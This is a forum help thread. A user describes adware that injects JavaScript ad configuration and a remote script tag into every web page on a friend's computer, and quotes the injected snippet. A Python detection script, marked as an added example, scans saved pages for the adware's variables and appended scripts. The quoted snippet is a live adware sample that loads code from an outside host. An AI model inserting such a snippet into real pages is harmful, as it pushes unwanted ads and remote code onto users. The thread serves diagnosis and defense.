Author Topic: Adware (local js injection)  (Read 4579 times)


REDACTED

  • Guest
Adware (local js injection)
« on: August 22, 2015, 06:05:53 PM »
Hello.
I'm not sure if this is the right forum to post my message on as I'm new on this forum.

Today one of my friends asked me to clean his computer because he had tons of ads on every single web site he visited.
Of course he tried to do a deep scan with Avast (free edition) but it couldn't find anything.

I've managed to isolate the cause of the issue. Something somewhere is injecting some javascript stuff at the end of every web page.
Here is exactly what is being injected. I've replaced the values clientid, channelid and clientcreatetime (we never know ...).

Quote
var e_rfndmeclientid = 11111111;
var e_rfndmechannelid = '111111';
var e_rfndmecustomwidgettitle='FlashBeat';
var e_rfndmecustomatalink = '';
var e_rfndmesubid = 'CN1';
var e_rfndmegeo = 'gb';
var e_rfndmeclientcreatetime       = 1111111111;
var e_rfndmeextid = '';
var e_displaysecondsinterval        = 300;
var e_rfndme_sys_show_intext        = true;
var e_rfndme_sys_intjs_display_seconds_interval = 300;
var e_sys_display_show_downloads   = true;
var e_rfndme_sys_show_ws           = true;
var e_rfndme_sys_show_easy2book    = true;
var e_rfndme_sys_show_irobinhood   = true;
var e_rfndme_sys_show_sfish        = true;
var e_rfndme_sys_show_sgt          = true;
var e_rfndme_sys_show_noproblem    = true;
var e_rfndme_sys_show_engageya     = true;
var e_rfndme_sys_show_display      = true;
var e_rfndme_sys_add_profiledata   = true;
var e_rfndme_sys_show_offerdynamic = true;
var e_rfndme_sys_show_intr_js      = true;
var e_rfndme_sys_intjs_allow_video = true;
var e_rfndme_cc_shopping           = true;
var e_rfndme_sys_show_intr_js_small_ads=true;
var e_rfndme_sys_show_ws_after     = 20500;
var e_rfndme_sys_intjs_allow_ws    = false;
var e_rfndme_sys_show_covus        = false;
var e_rfndme_sys_show_pre_roll_video = false;
var e_rfndme_sys_show_imonnomy = true;
var e_rfndme_sys_show_728_banner = true;
var e_rfndme_sys_show_serp = false;
var e_sys_display_show_search_engine_pops=true;
e_sys_display_show_search_engine_pops=true;e_rfndme_sys_show_serp=true; 


</script><script src="//s.orange81safe.com/gc0.js"></script>

This content is present on Internet Explorer, Firefox and Chrome.
I've done a couple of checks and it's not coming from the Kernel, apparently. All the modules/extensions on all the browsers have been disabled and uninstalled.
There's no proxy configured locally.
HTTPS connections are affected too. I've checked the certificates and everything looks alright.
So it means that the injection is happening internally in the process.

I'm just confused and intrigued about how it's being injected. Maybe a shared library or something? Because it affects all the browsers installed on the machine.

So I've just created a new firewall rule so it can't download the javascript file anymore. But obviously this is not a long term solution.

Any help would be greatly appreciated.
Thank you.
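
A check built from the snippet quoted in the post above, as an added example that is not part of the original post: it scans a saved page body for the `e_rfndme` variables and for script tags appended after the closing `</html>`. The function names, the `example.org` host and the sample pages are constructed for illustration, and it assumes the appended block lands after `</html>`.

```python
import re
from urllib.parse import urlparse

# Indicators taken from the injected snippet quoted in the post above.
VAR_PREFIX = re.compile(r"\bvar\s+(e_rfndme\w*)\s*=")
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)
END_OF_DOC = re.compile(r"</html\s*>", re.I)


def script_host(src, page_host):
    """Host a script URL resolves to; '//host/x' and relative URLs included."""
    if src.startswith("//"):
        src = "https:" + src
    return (urlparse(src).hostname or page_host).lower()


def inspect_page(html, page_host, allowed_hosts=()):
    """Report signs that markup was appended to a page after it left the server."""
    allowed = {page_host.lower(), *(h.lower() for h in allowed_hosts)}
    end = END_OF_DOC.search(html)
    tail_start = end.end() if end else len(html)
    findings = {"adware_vars": sorted(set(VAR_PREFIX.findall(html))),
                "foreign_scripts": [], "scripts_after_html_end": []}
    for m in SCRIPT_SRC.finditer(html):
        host = script_host(m.group(1), page_host)
        if host not in allowed:
            findings["foreign_scripts"].append(host)
        if m.start() >= tail_start:
            findings["scripts_after_html_end"].append(host)
    findings["suspicious"] = bool(findings["adware_vars"]
                                  or findings["scripts_after_html_end"])
    return findings


# Constructed sample: a tiny page, then the same page with part of the
# quoted snippet appended the way the post describes.
CLEAN = ('<html><head><script src="/static/app.js"></script></head>'
         '<body><p>Hello</p></body></html>')
INJECTED = CLEAN + ("<script>var e_rfndmeclientid = 11111111;\n"
                    "var e_rfndmegeo = 'gb';\n"
                    '</script><script src="//s.orange81safe.com/gc0.js"></script>')

if __name__ == "__main__":
    for name, body in (("clean", CLEAN), ("injected", INJECTED)):
        print(name, inspect_page(body, "example.org"))
```

Running it against the same URL saved from the affected machine and from a known-clean one shows whether the extra markup is added locally or served by the site.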

REDACTED

  • Guest
Re: Adware (local js injection)
« Reply #1 on: August 22, 2015, 06:10:46 PM »
I've just realised there's a dedicated section for this kind of issue.
Sorry for that. If a moderator can move this post to the right section that would be great.

Thank you  ;D

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 76037
    • >>>  Avast Forum - German-language section  <<<
Re: Adware (local js injection)
« Reply #2 on: August 22, 2015, 06:46:38 PM »
Start a new topic in V&W and post your logs there: https://forum.avast.com/index.php?action=post;board=4.0
W8.1 [x64] - Avast Free AV 23.3.8047.BC [UI.757] - Firefox ESR 102.9 [NS/uBO/PB] - Thunderbird 102.9.1
Avast-Tools: Secure Browser 109.0 - Cleanup 23.1 - SecureLine 5.18 - DriverUpdater 23.1 - CCleaner 6.01
Avast essentials (downloads, guides & info): https://forum.avast.com/index.php?topic=60523.0